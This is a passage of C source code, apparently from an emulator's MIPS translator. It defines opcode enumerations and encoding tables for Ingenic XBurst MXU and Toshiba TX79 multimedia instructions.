OPC_MXU_S32LDIR * | * | 23 * |- 010101 - OPC_MXU__POOL09 --- 0 - OPC_MXU_S32SDI * | |- 1 - OPC_MXU_S32SDIR * | * | 13..10 * |- 010110 - OPC_MXU__POOL10 --- 0000 - OPC_MXU_S32LDIV * | |- 0001 - OPC_MXU_S32LDIVR * | * | 13..10 * |- 010111 - OPC_MXU__POOL11 --- 0000 - OPC_MXU_S32SDIV * | |- 0001 - OPC_MXU_S32SDIVR * |- 011000 - OPC_MXU_D32ADD * | 23..22 * MXU |- 011001 - OPC_MXU__POOL12 --- 00 - OPC_MXU_D32ACC * opcodes -| |- 01 - OPC_MXU_D32ACCM * | |- 10 - OPC_MXU_D32ASUM * |- 011010 - <not assigned> * | 23..22 * |- 011011 - OPC_MXU__POOL13 --- 00 - OPC_MXU_Q16ACC * | |- 01 - OPC_MXU_Q16ACCM * | |- 10 - OPC_MXU_Q16ASUM * | * | 23..22 * |- 011100 - OPC_MXU__POOL14 --- 00 - OPC_MXU_Q8ADDE * | |- 01 - OPC_MXU_D8SUM * |- 011101 - OPC_MXU_Q8ACCE |- 10 - OPC_MXU_D8SUMC * |- 011110 - <not assigned> * |- 011111 - <not assigned> * |- 100000 - <not assigned> (overlaps with CLZ) * |- 100001 - <not assigned> (overlaps with CLO) * |- 100010 - OPC_MXU_S8LDD * |- 100011 - OPC_MXU_S8STD 15..14 * |- 100100 - OPC_MXU_S8LDI |- 00 - OPC_MXU_S32MUL * |- 100101 - OPC_MXU_S8SDI |- 00 - OPC_MXU_S32MULU * | |- 00 - OPC_MXU_S32EXTR * |- 100110 - OPC_MXU__POOL15 --- 00 - OPC_MXU_S32EXTRV * | * | 20..18 * |- 100111 - OPC_MXU__POOL16 --- 000 - OPC_MXU_D32SARW * | |- 001 - OPC_MXU_S32ALN * | |- 010 - OPC_MXU_S32ALNI * | |- 011 - OPC_MXU_S32LUI * | |- 100 - OPC_MXU_S32NOR * | |- 101 - OPC_MXU_S32AND * | |- 110 - OPC_MXU_S32OR * | |- 111 - OPC_MXU_S32XOR * | * | 7..5 * |- 101000 - OPC_MXU__POOL17 --- 000 - OPC_MXU_LXB * | |- 001 - OPC_MXU_LXH * |- 101001 - <not assigned> |- 011 - OPC_MXU_LXW * |- 101010 - OPC_MXU_S16LDD |- 100 - OPC_MXU_LXBU * |- 101011 - OPC_MXU_S16STD |- 101 - OPC_MXU_LXHU * |- 101100 - OPC_MXU_S16LDI * |- 101101 - OPC_MXU_S16SDI * |- 101110 - OPC_MXU_S32M2I * |- 101111 - OPC_MXU_S32I2M * |- 110000 - OPC_MXU_D32SLL * |- 110001 - OPC_MXU_D32SLR 20..18 * |- 110010 - OPC_MXU_D32SARL |- 000 - OPC_MXU_D32SLLV * |- 110011 - OPC_MXU_D32SAR |- 001 - OPC_MXU_D32SLRV * |- 110100 - OPC_MXU_Q16SLL |- 010 - OPC_MXU_D32SARV * |- 110101 - OPC_MXU_Q16SLR |- 011 - OPC_MXU_Q16SLLV * | |- 100 - OPC_MXU_Q16SLRV * |- 110110 - OPC_MXU__POOL18 --- 101 - OPC_MXU_Q16SARV * | * |- 110111 - OPC_MXU_Q16SAR * | 23..22 * |- 111000 - OPC_MXU__POOL19 --- 00 - OPC_MXU_Q8MUL * | |- 01 - OPC_MXU_Q8MULSU * | * | 20..18 * |- 111001 - OPC_MXU__POOL20 --- 000 - OPC_MXU_Q8MOVZ * | |- 001 - OPC_MXU_Q8MOVN * | |- 010 - OPC_MXU_D16MOVZ * | |- 011 - OPC_MXU_D16MOVN * | |- 100 - OPC_MXU_S32MOVZ * | |- 101 - OPC_MXU_S32MOVN * | * | 23..22 * |- 111010 - OPC_MXU__POOL21 --- 00 - OPC_MXU_Q8MAC * | |- 10 - OPC_MXU_Q8MACSU * |- 111011 - OPC_MXU_Q16SCOP * |- 111100 - OPC_MXU_Q8MADL * |- 111101 - OPC_MXU_S32SFL * |- 111110 - OPC_MXU_Q8SAD * |- 111111 - <not assigned> (overlaps with SDBBP) * * * Compiled after: * * "XBurst(c) Instruction Set Architecture MIPS eXtension/enhanced Unit * Programming Manual", Ingenic Semiconductor Co, Ltd., revision June 2, 2017 */ enum { OPC_MXU_S32MADD = 0x00, OPC_MXU_S32MADDU = 0x01, OPC__MXU_MUL = 0x02, OPC_MXU__POOL00 = 0x03, OPC_MXU_S32MSUB = 0x04, OPC_MXU_S32MSUBU = 0x05, OPC_MXU__POOL01 = 0x06, OPC_MXU__POOL02 = 0x07, OPC_MXU_D16MUL = 0x08, OPC_MXU__POOL03 = 0x09, OPC_MXU_D16MAC = 0x0A, OPC_MXU_D16MACF = 0x0B, OPC_MXU_D16MADL = 0x0C, OPC_MXU_S16MAD = 0x0D, OPC_MXU_Q16ADD = 0x0E, OPC_MXU_D16MACE = 0x0F, OPC_MXU__POOL04 = 0x10, OPC_MXU__POOL05 = 0x11, OPC_MXU__POOL06 = 0x12, OPC_MXU__POOL07 = 0x13, OPC_MXU__POOL08 = 0x14, OPC_MXU__POOL09 = 0x15, OPC_MXU__POOL10 = 0x16, OPC_MXU__POOL11 = 0x17, OPC_MXU_D32ADD = 0x18, OPC_MXU__POOL12 = 0x19, /* not assigned 0x1A */ OPC_MXU__POOL13 = 0x1B, OPC_MXU__POOL14 = 0x1C, OPC_MXU_Q8ACCE = 0x1D, /* not assigned 0x1E */ /* not assigned 0x1F */ /* not assigned 0x20 */ /* not assigned 0x21 */ OPC_MXU_S8LDD = 0x22, OPC_MXU_S8STD = 0x23, OPC_MXU_S8LDI = 0x24, OPC_MXU_S8SDI = 0x25, OPC_MXU__POOL15 = 0x26, OPC_MXU__POOL16 = 0x27, OPC_MXU__POOL17 = 0x28, /* not assigned 0x29 */ OPC_MXU_S16LDD = 0x2A, OPC_MXU_S16STD = 0x2B, OPC_MXU_S16LDI = 0x2C, OPC_MXU_S16SDI = 0x2D, OPC_MXU_S32M2I = 0x2E, OPC_MXU_S32I2M = 0x2F, OPC_MXU_D32SLL = 0x30, OPC_MXU_D32SLR = 0x31, OPC_MXU_D32SARL = 0x32, OPC_MXU_D32SAR = 0x33, OPC_MXU_Q16SLL = 0x34, OPC_MXU_Q16SLR = 0x35, OPC_MXU__POOL18 = 0x36, OPC_MXU_Q16SAR = 0x37, OPC_MXU__POOL19 = 0x38, OPC_MXU__POOL20 = 0x39, OPC_MXU__POOL21 = 0x3A, OPC_MXU_Q16SCOP = 0x3B, OPC_MXU_Q8MADL = 0x3C, OPC_MXU_S32SFL = 0x3D, OPC_MXU_Q8SAD = 0x3E, /* not assigned 0x3F */ }; /* * MXU pool 00 */ enum { OPC_MXU_S32MAX = 0x00, OPC_MXU_S32MIN = 0x01, OPC_MXU_D16MAX = 0x02, OPC_MXU_D16MIN = 0x03, OPC_MXU_Q8MAX = 0x04, OPC_MXU_Q8MIN = 0x05, OPC_MXU_Q8SLT = 0x06, OPC_MXU_Q8SLTU = 0x07, }; /* * MXU pool 01 */ enum { OPC_MXU_S32SLT = 0x00, OPC_MXU_D16SLT = 0x01, OPC_MXU_D16AVG = 0x02, OPC_MXU_D16AVGR = 0x03, OPC_MXU_Q8AVG = 0x04, OPC_MXU_Q8AVGR = 0x05, OPC_MXU_Q8ADD = 0x07, }; /* * MXU pool 02 */ enum { OPC_MXU_S32CPS = 0x00, OPC_MXU_D16CPS = 0x02, OPC_MXU_Q8ABD = 0x04, OPC_MXU_Q16SAT = 0x06, }; /* * MXU pool 03 */ enum { OPC_MXU_D16MULF = 0x00, OPC_MXU_D16MULE = 0x01, }; /* * MXU pool 04 */ enum { OPC_MXU_S32LDD = 0x00, OPC_MXU_S32LDDR = 0x01, }; /* * MXU pool 05 */ enum { OPC_MXU_S32STD = 0x00, OPC_MXU_S32STDR = 0x01, }; /* * MXU pool 06 */ enum { OPC_MXU_S32LDDV = 0x00, OPC_MXU_S32LDDVR = 0x01, }; /* * MXU pool 07 */ enum { OPC_MXU_S32STDV = 0x00, OPC_MXU_S32STDVR = 0x01, }; /* * MXU pool 08 */ enum { OPC_MXU_S32LDI = 0x00, OPC_MXU_S32LDIR = 0x01, }; /* * MXU pool 09 */ enum { OPC_MXU_S32SDI = 0x00, OPC_MXU_S32SDIR = 0x01, }; /* * MXU pool 10 */ enum { OPC_MXU_S32LDIV = 0x00, OPC_MXU_S32LDIVR = 0x01, }; /* * MXU pool 11 */ enum { OPC_MXU_S32SDIV = 0x00, OPC_MXU_S32SDIVR = 0x01, }; /* * MXU pool 12 */ enum { OPC_MXU_D32ACC = 0x00, OPC_MXU_D32ACCM = 0x01, OPC_MXU_D32ASUM = 0x02, }; /* * MXU pool 13 */ enum { OPC_MXU_Q16ACC = 0x00, OPC_MXU_Q16ACCM = 0x01, OPC_MXU_Q16ASUM = 0x02, }; /* * MXU pool 14 */ enum { OPC_MXU_Q8ADDE = 0x00, OPC_MXU_D8SUM = 0x01, OPC_MXU_D8SUMC = 0x02, }; /* * MXU pool 15 */ enum { OPC_MXU_S32MUL = 0x00, OPC_MXU_S32MULU = 0x01, OPC_MXU_S32EXTR = 0x02, OPC_MXU_S32EXTRV = 0x03, }; /* * MXU pool 16 */ enum { OPC_MXU_D32SARW = 0x00, OPC_MXU_S32ALN = 0x01, OPC_MXU_S32ALNI = 0x02, OPC_MXU_S32LUI = 0x03, OPC_MXU_S32NOR = 0x04, OPC_MXU_S32AND = 0x05, OPC_MXU_S32OR = 0x06, OPC_MXU_S32XOR = 0x07, }; /* * MXU pool 17 */ enum { OPC_MXU_LXB = 0x00, OPC_MXU_LXH = 0x01, OPC_MXU_LXW = 0x03, OPC_MXU_LXBU = 0x04, OPC_MXU_LXHU = 0x05, }; /* * MXU pool 18 */ enum { OPC_MXU_D32SLLV = 0x00, OPC_MXU_D32SLRV = 0x01, OPC_MXU_D32SARV = 0x03, OPC_MXU_Q16SLLV = 0x04, OPC_MXU_Q16SLRV = 0x05, OPC_MXU_Q16SARV = 0x07, }; /* * MXU pool 19 */ enum { OPC_MXU_Q8MUL = 0x00, OPC_MXU_Q8MULSU = 0x01, }; /* * MXU pool 20 */ enum { OPC_MXU_Q8MOVZ = 0x00, OPC_MXU_Q8MOVN = 0x01, OPC_MXU_D16MOVZ = 0x02, OPC_MXU_D16MOVN = 0x03, OPC_MXU_S32MOVZ = 0x04, OPC_MXU_S32MOVN = 0x05, }; /* * MXU pool 21 */ enum { OPC_MXU_Q8MAC = 0x00, OPC_MXU_Q8MACSU = 0x01, }; /* * Overview of the TX79-specific instruction set * ============================================= * * The R5900 and the C790 have 128-bit wide GPRs, where the upper 64 bits * are only used by the specific quadword (128-bit) LQ/SQ load/store * instructions and certain multimedia instructions (MMIs). These MMIs * configure the 128-bit data path as two 64-bit, four 32-bit, eight 16-bit * or sixteen 8-bit paths. * * Reference: * * The Toshiba TX System RISC TX79 Core Architecture manual, * https://wiki.qemu.org/File:C790.pdf * * Three-Operand Multiply and Multiply-Add (4 instructions) * -------------------------------------------------------- * MADD [rd,] rs, rt Multiply/Add * MADDU [rd,] rs, rt Multiply/Add Unsigned * MULT [rd,] rs, rt Multiply (3-operand) * MULTU [rd,] rs, rt Multiply Unsigned (3-operand) * * Multiply Instructions for Pipeline 1 (10 instructions) * ------------------------------------------------------ * MULT1 [rd,] rs, rt Multiply Pipeline 1 * MULTU1 [rd,] rs, rt Multiply Unsigned Pipeline 1 * DIV1 rs, rt Divide Pipeline 1 * DIVU1 rs, rt Divide Unsigned Pipeline 1 * MADD1 [rd,] rs, rt Multiply-Add Pipeline 1 * MADDU1 [rd,] rs, rt Multiply-Add Unsigned Pipeline 1 * MFHI1 rd Move From HI1 Register * MFLO1 rd Move From LO1 Register * MTHI1 rs Move To HI1 Register * MTLO1 rs Move To LO1 Register * * Arithmetic (19 instructions) * ---------------------------- * PADDB rd, rs, rt Parallel Add Byte * PSUBB rd, rs, rt Parallel Subtract Byte * PADDH rd, rs, rt Parallel Add Halfword * PSUBH rd, rs, rt Parallel Subtract Halfword * PADDW rd, rs, rt Parallel Add Word * PSUBW rd, rs, rt Parallel Subtract Word * PADSBH rd, rs, rt Parallel Add/Subtract Halfword * PADDSB rd, rs, rt Parallel Add with Signed Saturation Byte * PSUBSB rd, rs, rt Parallel Subtract with Signed Saturation Byte * PADDSH rd, rs, rt Parallel Add with Signed Saturation Halfword * PSUBSH rd, rs, rt Parallel Subtract with Signed Saturation Halfword * PADDSW rd, rs, rt Parallel Add with Signed Saturation Word * PSUBSW rd, rs, rt Parallel Subtract with Signed Saturation Word * PADDUB rd, rs, rt Parallel Add with Unsigned saturation Byte * PSUBUB rd, rs, rt Parallel Subtract with Unsigned saturation Byte * PADDUH rd, rs, rt Parallel Add with Unsigned saturation Halfword * PSUBUH rd, rs, rt Parallel Subtract with Unsigned saturation Halfword * PADDUW rd, rs, rt Parallel Add with Unsigned saturation Word * PSUBUW rd, rs, rt Parallel Subtract with Unsigned saturation Word * * Min/Max (4 instructions) * ------------------------ * PMAXH rd, rs, rt Parallel Maximum Halfword * PMINH rd, rs, rt Parallel Minimum Halfword * PMAXW rd, rs, rt Parallel Maximum Word * PMINW rd, rs, rt Parallel Minimum Word * * Absolute (2 instructions) * ------------------------- * PABSH rd, rt Parallel Absolute Halfword * PABSW rd, rt Parallel Absolute Word * * Logical (4 instructions) * ------------------------ * PAND rd, rs, rt Parallel AND * POR rd, rs, rt Parallel OR * PXOR rd, rs, rt Parallel XOR * PNOR rd, rs, rt Parallel NOR * * Shift (9 instructions) * ---------------------- * PSLLH rd, rt, sa Parallel Shift Left Logical Halfword * PSRLH rd, rt, sa Parallel Shift Right Logical Halfword * PSRAH rd, rt, sa Parallel Shift Right Arithmetic Halfword * PSLLW rd, rt, sa Parallel Shift Left Logical Word * PSRLW rd, rt, sa Parallel Shift Right Logical Word * PSRAW rd, rt, sa Parallel Shift Right Arithmetic Word * PSLLVW rd, rt, rs Parallel Shift Left Logical Variable Word * PSRLVW rd, rt, rs Parallel Shift Right Logical Variable Word * PSRAVW rd, rt, rs Parallel Shift Right Arithmetic Variable Word * * Compare (6 instructions) * ------------------------ * PCGTB rd, rs, rt Parallel Compare for Greater Than Byte * PCEQB rd, rs, rt Parallel Compare for Equal Byte * PCGTH rd, rs, rt Parallel Compare for Greater Than Halfword * PCEQH rd, rs, rt Parallel Compare for Equal Halfword * PCGTW rd, rs, rt Parallel Compare for Greater Than Word * PCEQW rd, rs, rt Parallel Compare for Equal Word * * LZC (1 instruction) * ------------------- * PLZCW rd, rs Parallel Leading Zero or One Count Word * * Quadword Load and Store (2 instructions) * ---------------------------------------- * LQ rt, offset(base) Load Quadword * SQ rt, offset(base) Store Quadword * * Multiply and Divide (19 instructions) * ------------------------------------- * PMULTW rd, rs, rt Parallel Multiply Word * PMULTUW rd, rs, rt Parallel Multiply Unsigned Word * PDIVW rs, rt Parallel Divide Word * PDIVUW rs, rt Parallel Divide Unsigned Word * PMADDW rd, rs, rt Parallel Multiply-Add Word * PMADDUW rd, rs, rt Parallel Multiply-Add Unsigned Word * PMSUBW rd, rs, rt Parallel Multiply-Subtract Word * PMULTH rd, rs, rt Parallel Multiply Halfword * PMADDH rd, rs, rt Parallel Multiply-Add Halfword * PMSUBH rd, rs, rt Parallel Multiply-Subtract Halfword * PHMADH rd, rs, rt Parallel Horizontal Multiply-Add Halfword * PHMSBH rd, rs, rt Parallel Horizontal Multiply-Subtract Halfword * PDIVBW rs, rt Parallel Divide Broadcast Word * PMFHI rd Parallel Move From HI Register * PMFLO rd Parallel Move From LO Register * PMTHI rs Parallel Move To HI Register * PMTLO rs Parallel Move To LO Register * PMFHL rd Parallel Move From HI/LO Register * PMTHL rs Parallel Move To HI/LO Register * * Pack/Extend (11 instructions) * ----------------------------- * PPAC5 rd, rt Parallel Pack to 5 bits * PPACB rd, rs, rt Parallel Pack to Byte * PPACH rd, rs, rt Parallel Pack to Halfword * PPACW rd, rs, rt Parallel Pack to Word * PEXT5 rd, rt Parallel Extend Upper from 5 bits * PEXTUB rd, rs, rt Parallel Extend Upper from Byte * PEXTLB rd, rs, rt Parallel Extend Lower from Byte * PEXTUH rd, rs, rt Parallel Extend Upper from Halfword * PEXTLH rd, rs, rt Parallel Extend Lower from Halfword * PEXTUW rd, rs, rt Parallel Extend Upper from Word * PEXTLW rd, rs, rt Parallel Extend Lower from Word * * Others (16 instructions) * ------------------------ * PCPYH rd, rt Parallel Copy Halfword * PCPYLD rd, rs, rt Parallel Copy Lower Doubleword * PCPYUD rd, rs, rt Parallel Copy Upper Doubleword * PREVH rd, rt Parallel Reverse Halfword * PINTH rd, rs, rt Parallel Interleave Halfword * PINTEH rd, rs, rt Parallel Interleave Even Halfword * PEXEH rd, rt Parallel Exchange Even Halfword * PEXCH rd, rt Parallel Exchange Center Halfword * PEXEW rd, rt Parallel Exchange Even Word * PEXCW rd, rt Parallel Exchange Center Word * QFSRV rd, rs, rt Quadword Funnel Shift Right Variable * MFSA rd Move from Shift Amount Register * MTSA rs Move to Shift Amount Register * MTSAB rs, immediate Move Byte Count to Shift Amount Register * MTSAH rs, immediate Move Halfword Count to Shift Amount Register * PROT3W rd, rt Parallel Rotate 3 Words * * MMI (MultiMedia Instruction) encodings * ====================================== * * MMI instructions encoding table keys: * * * This code is reserved for future use. An attempt to execute it * causes a Reserved Instruction exception. * % This code indicates an instruction class. The instruction word * must be further decoded by examining additional tables that show * the values for other instruction fields. * # This code is reserved for the unsupported instructions DMULT, * DMULTU, DDIV, DDIVU, LL, LLD, SC, SCD, LWC2 and SWC2. An attempt * to execute it causes a Reserved Instruction exception. * * MMI instructions encoded by opcode field (MMI, LQ, SQ): * * 31 26 0 * +--------+----------------------------------------+ * | opcode | | * +--------+----------------------------------------+ * * opcode bits 28..26 * bits | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 * 31..29 | 000 | 001 | 010 | 011 | 100 | 101 | 110 | 111 * -------+-------+-------+-------+-------+-------+-------+-------+------- * 0 000 |SPECIAL| REGIMM| J | JAL | BEQ | BNE | BLEZ | BGTZ * 1 001 | ADDI | ADDIU | SLTI | SLTIU | ANDI | ORI | XORI | LUI * 2 010 | COP0 | COP1 | * | * | BEQL | BNEL | BLEZL | BGTZL * 3 011 | DADDI | DADDIU| LDL | LDR | MMI% | * | LQ | SQ * 4 100 | LB | LH | LWL | LW | LBU | LHU | LWR | LWU * 5 101 | SB | SH | SWL | SW | SDL | SDR | SWR | CACHE * 6 110 | # | LWC1 | # | PREF | # | LDC1 | # | LD * 7 111 | # | SWC1 | # | * | # | SDC1 | # | SD */ enum { MMI_OPC_CLASS_MMI = 0x1C << 26, /* Same as OPC_SPECIAL2 */ MMI_OPC_LQ = 0x1E << 26, /* Same as OPC_MSA */ MMI_OPC_SQ = 0x1F << 26, /* Same as OPC_SPECIAL3 */ }; /* * MMI instructions with opcode field = MMI: * * 31 26 5 0 * +--------+-------------------------------+--------+ * | MMI | |function| * +--------+-------------------------------+--------+ * * function bits 2..0 * bits | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 * 5..3 | 000 | 001 | 010 | 011 | 100 | 101 | 110 | 111 * -------+-------+-------+-------+-------+-------+-------+-------+------- * 0 000 | MADD | MADDU | * | * | PLZCW | * | * | * * 1 001 | MMI0% | MMI2% | * | * | * | * | * | * * 2 010 | MFHI1 | MTHI1 | MFLO1 | MTLO1 | * | * | * | * * 3 011 | MULT1 | MULTU1| DIV1 | DIVU1 | * | * | * | * * 4 100 | MADD1 | MADDU1| * | * | * | * | * | * * 5 101 | MMI1% | MMI3% | * | * | * | * | * | * * 6 110 | PMFHL | PMTHL | * | * | PSLLH | * | PSRLH | PSRAH * 7 111 | * | * | * | * | PSLLW | * | PSRLW | PSRAW */ #define MASK_MMI(op) (MASK_OP_MAJOR(op) | ((op) & 0x3F)) enum { MMI_OPC_MADD = 0x00 | MMI_OPC_CLASS_MMI, /* Same as OPC_MADD */ MMI_OPC_MADDU = 0x01 | MMI_OPC_CLASS_MMI, /* Same as OPC_MADDU */ MMI_OPC_PLZCW = 0x04 | MMI_OPC_CLASS_MMI, MMI_OPC_CLASS_MMI0 = 0x08 | MMI_OPC_CLASS_MMI, MMI_OPC_CLASS_MMI2 = 0x09 | MMI_OPC_CLASS_MMI, MMI_OPC_MFHI1 = 0x10 | MMI_OPC_CLASS_MMI, /* Same minor as OPC_MFHI */ MMI_OPC_MTHI1 = 0x11 | MMI_OPC_CLASS_MMI, /* Same minor as OPC_MTHI */ MMI_OPC_MFLO1 = 0x12 | MMI_OPC_CLASS_MMI, /* Same minor as OPC_MFLO */ MMI_OPC_MTLO1 = 0x13 | MMI_OPC_CLASS_MMI, /* Same minor as OPC_MTLO */ MMI_OPC_MULT1 = 0x18 | MMI_OPC_CLASS_MMI, /* Same minor as OPC_MULT */ MMI_OPC_MULTU1 = 0x19 | MMI_OPC_CLASS_MMI, /* Same min. as OPC_MULTU */ MMI_OPC_DIV1 = 0x1A | MMI_OPC_CLASS_MMI, /* Same minor as OPC_DIV */ MMI_OPC_DIVU1 = 0x1B | MMI_OPC_CLASS_MMI, /* Same minor as OPC_DIVU */ MMI_OPC_MADD1 = 0x20 | MMI_OPC_CLASS_MMI, MMI_OPC_MADDU1 = 0x21 | MMI_OPC_CLASS_MMI, MMI_OPC_CLASS_MMI1 = 0x28 | MMI_OPC_CLASS_MMI, MMI_OPC_CLASS_MMI3 = 0x29 | MMI_OPC_CLASS_MMI, MMI_OPC_PMFHL = 0x30 | MMI_OPC_CLASS_MMI, MMI_OPC_PMTHL = 0x31 | MMI_OPC_CLASS_MMI, MMI_OPC_PSLLH = 0x34 | MMI_OPC_CLASS_MMI, MMI_OPC_PSRLH = 0x36 | MMI_OPC_CLASS_MMI, MMI_OPC_PSRAH = 0x37 | MMI_OPC_CLASS_MMI, MMI_OPC_PSLLW = 0x3C | MMI_OPC_CLASS_MMI, MMI_OPC_PSRLW = 0x3E | MMI_OPC_CLASS_MMI, MMI_OPC_PSRAW = 0x3F | MMI_OPC_CLASS_MMI, }; /* * MMI instructions with opcode field = MMI and bits 5..0 = MMI0: * * 31 26 10 6 5 0 * +--------+----------------------+--------+--------+ * | MMI | |function| MMI0 | * +--------+----------------------+--------+--------+ * * function bits 7..6 * bits | 0 | 1 | 2 | 3 * 10..8 | 00 | 01 | 10 | 11 * -------+-------+-------+-------+------- * 0 000 | PADDW | PSUBW | PCGTW | PMAXW * 1 001 | PADDH | PSUBH | PCGTH | PMAXH * 2 010 | PADDB | PSUBB | PCGTB | * * 3 011 | * | * | * | * * 4 100 | PADDSW| PSUBSW| PEXTLW| PPACW * 5 101 | PADDSH| PSUBSH| PEXTLH| PPACH * 6 110 | PADDSB| PSUBSB| PEXTLB| PPACB * 7 111 | * | * | PEXT5 | PPAC5 */ #define MASK_MMI0(op) (MASK_OP_MAJOR(op) | ((op) & 0x7FF)) enum { MMI_OPC_0_PADDW = (0x00 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PSUBW = (0x01 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PCGTW = (0x02 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PMAXW = (0x03 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PADDH = (0x04 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PSUBH = (0x05 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PCGTH = (0x06 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PMAXH = (0x07 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PADDB = (0x08 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PSUBB = (0x09 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PCGTB = (0x0A << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PADDSW = (0x10 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PSUBSW = (0x11 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PEXTLW = (0x12 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PPACW = (0x13 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PADDSH = (0x14 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PSUBSH = (0x15 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PEXTLH = (0x16 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PPACH = (0x17 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PADDSB = (0x18 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PSUBSB = (0x19 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PEXTLB = (0x1A << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PPACB = (0x1B << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PEXT5 = (0x1E << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PPAC5 = (0x1F << 6) | MMI_OPC_CLASS_MMI0, }; /* * MMI instructions with opcode field = MMI and bits 5..0 = MMI1: * * 31 26 10 6 5 0 * +--------+----------------------+--------+--------+ * | MMI | |function| MMI1 | * +--------+----------------------+--------+--------+ * * function bits 7..6 * bits | 0 | 1 | 2 | 3 * 10..8 | 00 | 01 | 10 | 11 * -------+-------+-------+-------+------- * 0 000 | * | PABSW | PCEQW | PMINW * 1 001 | PADSBH| PABSH | PCEQH | PMINH * 2 010 | * | * | PCEQB | * * 3 011 | * | * | * | * * 4 100 | PADDUW| PSUBUW| PEXTUW| * * 5 101 | PADDUH| PSUBUH| PEXTUH| * * 6 110 | PADDUB| PSUBUB| PEXTUB| QFSRV * 7 111 | * | * | * | * */ #define MASK_MMI1(op) (MASK_OP_MAJOR(op) | ((op) & 0x7FF)) enum { MMI_OPC_1_PABSW = (0x01 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PCEQW = (0x02 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PMINW = (0x03 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PADSBH = (0x04 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PABSH = (0x05 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PCEQH = (0x06 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PMINH = (0x07 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PCEQB = (0x0A << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PADDUW = (0x10 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PSUBUW = (0x11 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PEXTUW = (0x12 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PADDUH = (0x14 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PSUBUH = (0x15 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PEXTUH = (0x16 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PADDUB = (0x18 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PSUBUB = (0x19 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PEXTUB = (0x1A << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_QFSRV = (0x1B << 6) | MMI_OPC_CLASS_MMI1, }; /* * MMI instructions with opcode field = MMI and bits 5..0 = MMI2: * * 31 26 10 6 5 0 * +--------+----------------------+--------+--------+ * | MMI | |function| MMI2 | * +--------+----------------------+--------+--------+ * * function bits 7..6 * bits | 0 | 1 | 2 | 3 * 10..8 | 00 | 01 | 10 | 11 * -------+-------+-------+-------+------- * 0 000 | PMADDW| * | PSLLVW| PSRLVW * 1 001 | PMSUBW| * | * | * * 2 010 | PMFHI | PMFLO | PINTH | * * 3 011 | PMULTW| PDIVW | PCPYLD| * * 4 100 | PMADDH| PHMADH| PAND | PXOR * 5 101 | PMSUBH| PHMSBH| * | * * 6 110 | * | * | PEXEH | PREVH * 7 111 | PMULTH| PDIVBW| PEXEW | PROT3W */ #define MASK_MMI2(op) (MASK_OP_MAJOR(op) | ((op) & 0x7FF)) enum { MMI_OPC_2_PMADDW = (0x00 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PSLLVW = (0x02 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PSRLVW = (0x03 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PMSUBW = (0x04 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PMFHI = (0x08 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PMFLO = (0x09 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PINTH = (0x0A << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PMULTW = (0x0C << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PDIVW = (0x0D << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PCPYLD = (0x0E << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PMADDH = (0x10 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PHMADH = (0x11 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PAND = (0x12 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PXOR = (0x13 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PMSUBH = (0x14 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PHMSBH = (0x15 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PEXEH = (0x1A << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PREVH = (0x1B << 6) | 